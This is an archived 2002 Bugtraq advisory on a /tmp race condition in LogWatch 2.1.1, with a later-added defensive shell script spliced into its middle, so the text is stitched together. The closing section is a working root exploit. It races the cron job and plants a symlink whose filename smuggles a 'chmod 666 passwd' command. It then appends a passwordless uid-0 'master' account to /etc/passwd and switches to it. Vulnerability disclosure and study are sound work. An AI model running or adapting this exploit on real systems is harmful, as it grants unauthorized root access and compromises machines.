8208133 2002-03-27 03:16 +0100 /110 lines/ Spybreak <spybreak@host.sk>
Sent by: joel@lysator.liu.se
Imported: 2002-03-27 19:53 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <21599>
Subject: Root compromise through LogWatch 2.1.1
------------------------------------------------------------
From: "Spybreak" <spybreak@host.sk>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <20020327031626.M78748@host.sk>

Release  : March 27 2002
Author   : Spybreak <spybreak@host.sk>
Software : LogWatch
Version  : 2.1.1
Homepage : www.kaybee.org/~kirk/html/linux.html
Problems : A /tmp race condition leads to root

--- INTRO ---

LogWatch is a customizable log analysis system. LogWatch parses your system's
logs for a given period of time and creates a report analyzing the areas that
you specify, in as much detail as you require. The collected results are
reported to a chosen e-mail address, root by default. LogWatch 2.1.1 is part
of the Red Hat Linux 7.2 distribution, enabled by default and run daily by the
cron daemon.

--- PROBLEM ---

On a system running LogWatch, a local user is able to gain unauthorized root
access due to a race condition during temporary directory creation.
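The race described above comes down to a privileged job creating its temporary directory under a name a local user can guess. The POSIX shell script below is an added example, not LogWatch's code or the advisory author's: it sets that pattern beside mktemp-based creation and adds a small audit that counts symlinks planted inside logwatch.* directories. The vulnerable pattern is modelled on the advisory's description rather than on LogWatch 2.1.1 source, and the base directory, the pid 4242 and the dummy link target are constructed values.

```shell
#!/bin/sh
# Added example (not LogWatch's own code). The vulnerable pattern is
# modelled on the advisory's description, not on LogWatch 2.1.1 source.

# Precondition the advisory describes, reproduced only to drive the audit
# and demo: the directory exists before the job runs and already holds a
# symlink named "cron". The link target is a constructed dummy path.
seed_predictable_dir() {            # $1 = base dir, $2 = pid
    mkdir -p "$1/logwatch.$2" && ln -s "$1/dummy-target" "$1/logwatch.$2/cron"
}

# Vulnerable pattern: the name is derived from a PID anyone can read from
# "ps", and a directory that already exists is adopted unchecked.
tmpdir_predictable() {              # $1 = base dir, $2 = pid; prints the path
    dir="$1/logwatch.$2"
    mkdir "$dir" 2>/dev/null || true   # "already exists" is silently ignored
    printf '%s\n' "$dir"
}

# Safe pattern: mktemp -d creates an unpredictably named directory
# atomically with mode 0700, so a pre-seeded directory can never be adopted.
# The ownership and not-a-symlink checks are a second line of defence.
tmpdir_safe() {                     # $1 = base dir; prints the path
    dir=$(mktemp -d "$1/logwatch.XXXXXXXXXX") || return 1
    if [ -L "$dir" ] || [ ! -d "$dir" ] || [ ! -O "$dir" ]; then
        rm -rf "$dir"; return 1
    fi
    printf '%s\n' "$dir"
}

# Defender's audit: count symlinks inside logwatch.* directories under the
# base, which a cron-time check or file-integrity rule could alert on.
count_planted_links() {             # $1 = base dir; prints the count
    n=0
    for d in "$1"/logwatch.*; do
        [ -d "$d" ] && [ ! -L "$d" ] || continue
        for f in "$d"/* "$d"/.[!.]*; do
            if [ -L "$f" ]; then n=$((n + 1)); fi
        done
    done
    printf '%s\n' "$n"
}

# Stand-alone demo in a private sandbox (never the real /tmp).
box=$(mktemp -d) || exit 1
seed_predictable_dir "$box" 4242
echo "planted links: $(count_planted_links "$box")"
echo "predictable  : $(tmpdir_predictable "$box" 4242)"
echo "safe         : $(tmpdir_safe "$box")"
rm -rf "$box"
```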
--- EXPLOIT ---

cat > logwatch211.sh <<EOF
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>

SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/

echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"

while :; do
  set `ps -o pid -C $SERVANT`
  if [ -n "$2" ]; then
    mkdir /tmp/logwatch.$2
    ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
    break
  fi
done

echo "Waiting for LogWatch to finish its work"

while :; do
  set `ps -o pid -C $SERVANT`
  if [ -z "$2" ]; then
    ls -l /etc/passwd|mail root
    echo master::0:0:master:/root:/bin/bash >> /etc/passwd
    break
  fi
done

su master
EOF

(8208133) /Spybreak <spybreak@host.sk>/-------------